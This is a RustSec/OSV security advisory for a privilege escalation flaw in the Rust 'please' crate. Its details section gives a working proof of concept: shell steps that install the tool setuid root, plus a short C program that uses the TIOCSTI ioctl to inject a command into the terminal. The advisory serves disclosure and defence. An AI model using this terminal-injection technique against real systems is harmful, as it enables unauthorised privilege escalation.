RUSTSEC-2023-0066

Source
https://rustsec.org/advisories/RUSTSEC-2023-0066
Import Source
https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0066.json
JSON Data
https://api.osv.dev/v1/vulns/RUSTSEC-2023-0066
Aliases
Published
2023-04-29T12:00:00Z
Modified
2024-02-10T15:57:43Z
Severity
  • 4.6 (Medium) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N CVSS Calculator
Summary
Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX
Details

please is vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX on systems where they are not disabled.

Here is how to see it in action:

$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD  # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <&lt;TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>

int main(void) {
  const char *text = "id\n";
  while (*text)
    ioctl(0, TIOCSTI, text++);
  return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI  # runs id(1) as ${USER} rather than nobody

Please note that:

This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.

Database specific
{
    "license": "CC0-1.0"
}
References

Affected packages

crates.io / pleaser

Package

Affected ranges

Type
SEMVER
Events
Introduced
0.0.0-0

Ecosystem specific

{
    "affected_functions": null,
    "affects": {
        "os": [],
        "functions": [],
        "arch": []
    }
}

Database specific

{
    "cvss": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
    "informational": null,
    "categories": [
        "privilege-escalation"
    ]
}